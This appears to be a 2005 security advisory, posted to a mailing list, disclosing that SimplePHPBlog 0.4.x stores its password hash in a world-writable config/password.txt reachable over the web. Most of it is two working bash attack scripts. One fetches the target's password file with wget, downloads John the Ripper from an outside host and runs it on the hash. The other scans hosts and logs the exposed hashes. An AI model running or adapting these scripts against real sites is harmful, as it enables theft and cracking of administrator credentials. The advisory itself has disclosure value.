simplephpBlog040.txt

`  
__ .__  
______ |__|_____ | | ___.__.  
\____ \ | \____ \| |< | |  
| |_> > | | |_> > |_\___ |  
| __/\__| | __/|____/ ____|  
|__| \______|__| \/ Where is the security? ...  
  
Security Advisory 2005-0x00  
  
Authors......... pjphem && LazyCrs  
Date............ 07/07/2005  
Vendor.......... www.simplephpblog.com  
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure  
  
  
  
o The Problem:  
--------------  
  
  
bash-3.00# cat install02.php  
  
$result = create_folder( 'config' );  
  
bash-3.00# cat sb_login.php  
  
// If there's no password file then need to redirect them.  
$passFile = 'config/password.txt';  
  
----------------------------------------------------------------------------------------  
  
function create_password ( $user, $pass ) {  
// Generate and store password hash  
  
$mypasswd = $user.$pass;  
$hashed = crypt($mypasswd);  
  
// Save File  
$filename = 'config/password.txt';  
$result = sb_write_file( $filename, $hashed );  
  
----------------------------------------------------------------------------------------  
  
function check_password ( $user, $pass ) {  
// Check password against hashed password file  
  
$passFile = 'config/password.txt';  
$hashed = sb_read_file( $passFile );  
  
  
bash-3.00# ls -l `pwd` |grep config  
drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config  
  
  
o Proof of concept:  
-------------------  
  
bash-3.00$ cat 0xfuck-phpblog.sh  
#!/bin/bash  
###################################################################  
#  
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)  
#  
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS  
#  
# This is published proprietary source code of 0xpjply  
#  
# (C) COPYRIGHT 0xpjply security guru group, 2005  
# All Rights Reserved  
#  
# dummy exploit written by pjphem && infected on July 2005  
#  
###################################################################  
# contact:  
# pjphem && LazyCrs  
#  
# [email protected] && [email protected]  
#  
#Greetz:  
#  
# You think you know? You have no idea!  
# fluffi-  
#  
#  
#  
# RAFA FREE  
#  
###################################################################  
echo ""  
echo ""  
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "  
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := "  
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "  
echo ""  
echo " c0de by pjphem "  
echo ""  
echo ""  
echo " vulnerabili Simple php blog 0.4.4 <= "  
echo ""  
echo ""  
echo -n "inserisci un hostname: " ; read hostname ;  
echo -n "inserisci dir: " ; read dir ;  
echo ""  
echo "[*] praparando l'ambiente..."  
mkdir 0xpjply  
cd 0xpjply  
echo -t3 "[*] OK!"  
echo "[*] Cattura password..."  
wget http://$hostname/$dir/config/password.txt  
echo "[*] OK!"  
echo ""  
echo ""  
echo "Show password: (md5)"  
echo ""  
cat password.txt  
echo ""  
rm -rf password.txt  
echo ""  
echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] "  
read Q  
if [ $Q = y ];  
then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz  
else  
exit 1;  
fi  
tar -zxf john.tar.gz  
cd john  
echo ""  
echo "[*] Dowloading password.."  
echo ""  
wget http://$hostname/$dir/config/password.txt  
echo ""  
echo "Done!"  
echo ""  
echo "STARING John for decript password.. enJoy"  
./jonh password.txt  
echo ""  
echo ""  
bash-3.00$  
  
  
  
  
bash-3.00$ cat 0xfuck-phpblog-scanner.sh  
#!/bin/bash  
#  
# Simple tester for phpblog  
#  
# phpblog 0.4.4 <=  
#  
#######################################  
echo "host , directory blog: (ex. test.it blog)"  
read HOST BLOG  
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3  
bash-3.00$  
  
  
  
  
---------------------------------------------------------------  
Scegli il tuo dominio preferito e attiva la tua email! Da oggi  
l'eMail di superEva e' ancora piu' veloce e ricca di funzioni!  
http://webmail.supereva.it/new/  
---------------------------------------------------------------  
  
`